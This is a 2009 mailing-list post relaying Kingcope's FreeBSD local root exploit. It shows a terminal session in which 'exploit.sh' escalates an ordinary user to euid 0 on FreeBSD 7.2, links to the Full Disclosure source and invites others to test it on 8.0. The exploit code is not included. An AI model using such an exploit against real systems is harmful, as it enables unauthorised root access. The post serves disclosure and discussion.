[PCBSD-malaysia] local r00t exploit

Yusof Khalid - FreeBSD / OpenBSD fryshadow at gmail.com
Tue Dec 1 22:05:55 PST 2009


$ id
uid=1002(test) gid=1002(test) groups=1002(test)
$ sh exploit.sh
env env.c exploit.sh program.c program.o w00t.so.1.0 FreeBSD local r00t
zeroday
by Kingcope
November 2009
env.c: In function 'main':
env.c:5: warning: incompatible implicit declaration of built-in function
'malloc'
env.c:9: warning: incompatible implicit declaration of built-in function
'strcpy'
env.c:11: warning: incompatible implicit declaration of built-in function
'execl'
cp: /tmp/w00t.so.1.0: Permission denied
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
ALEX-ALEX
# id
uid=1002(test) gid=1002(test) euid=0(root) groups=1002(test)
# uname -a
FreeBSD proxy.opigateway-local.net 7.2-RELEASE FreeBSD 7.2-RELEASE #0: Fri
May  1 08:49:13 UTC 2009
root at walker.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC
i386

source : http://seclists.org/fulldisclosure/2009/Nov/371

dengar 8.0-Release pn kena juga, sape2 leh test dialu2kan :)
-- 
_________________________
http://blog.myinfinityx.com
_________________________
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.pcbsd.org/pipermail/pcbsd-malaysia/attachments/20091202/766da7eb/attachment.html 


More information about the PCBSD-malaysia mailing list